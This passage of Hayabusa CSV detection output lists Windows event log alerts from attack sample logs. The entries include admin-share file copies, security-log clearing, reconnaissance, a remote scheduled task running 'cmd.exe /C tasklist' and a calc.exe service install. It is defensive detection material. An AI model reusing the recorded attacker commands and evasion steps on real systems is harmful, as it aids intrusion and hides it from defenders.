Path: Windows\assembly\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Fonts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Media\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.529 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\setup.bat | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\setup.bat | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\ui\SwDRM.dll | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x10fac2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x10fbcc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 
0x10fbeb,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x10fc09,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.692 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: user01 | Computer: | IP Addr: 10.0.2.17 | LID: 0x110085,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:43.570 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e162,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: user01 | Computer: | IP Addr: 10.0.2.17 | LID: 0x15e1a7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share 
Access,User: user01 | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.0.2.17 | LID: 0x15e1a7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e25f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: WIN-77LTAPHIQ1R$ | Share Name: \\*\SYSVOL | Share Path: 
\??\C:\Windows\SYSVOL\sysvol | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e25f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups 
Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: WIN-77LTAPHIQ1R | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.179 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: NULL | IP Addr: 10.0.2.17 | LID: 0x17e29a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer: | Status: 
0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2aa,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x17e2aa,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer: | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2c0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | 
Computer: | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer: | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2d2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.319 +09:00,WIN-77LTAPHIQ1R.example.corp,4698,info,,Task Created,"Name: \CYAlyNSS | Content: 2015-07-15T20:35:13.2757294 true 1 S-1-5-18 HighestAvailable InteractiveToken IgnoreNew false false true false true false true true true false false P3D 7 cmd.exe /C tasklist > %windir%\Temp\CYAlyNSS.tmp 2>&1 | User: Administrator | LID: 0x17e2d2",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx +2019-03-19 09:02:04.319 +09:00,WIN-77LTAPHIQ1R.example.corp,4698,info,,Task Created,"Name: \CYAlyNSS | Content: 2015-07-15T20:35:13.2757294 true 1 S-1-5-18 HighestAvailable InteractiveToken IgnoreNew false false true false true false true true true false false P3D 7 cmd.exe /C tasklist > %windir%\Temp\CYAlyNSS.tmp 2>&1 | User: Administrator | LID: 0x17e2d2",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 
09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,info,,Task Deleted,Name: \CYAlyNSS | User: Administrator | LID: 0x17e2d2,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx +2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx +2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,info,,Task Deleted,Name: \CYAlyNSS | User: Administrator | LID: 0x17e2d2,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 
0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.508 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.523 
+09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: WIN-77LTAPHIQ1R | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x18423d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:41:29.008 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,Persis,Service Installed,Name: remotesvc | Path: calc.exe | Account: LocalSystem | Start Type: auto 
start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x39e47fa | PID: 3824 | PGUID: 365ABB72-2550-5C91-0000-00108FE4CF05",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 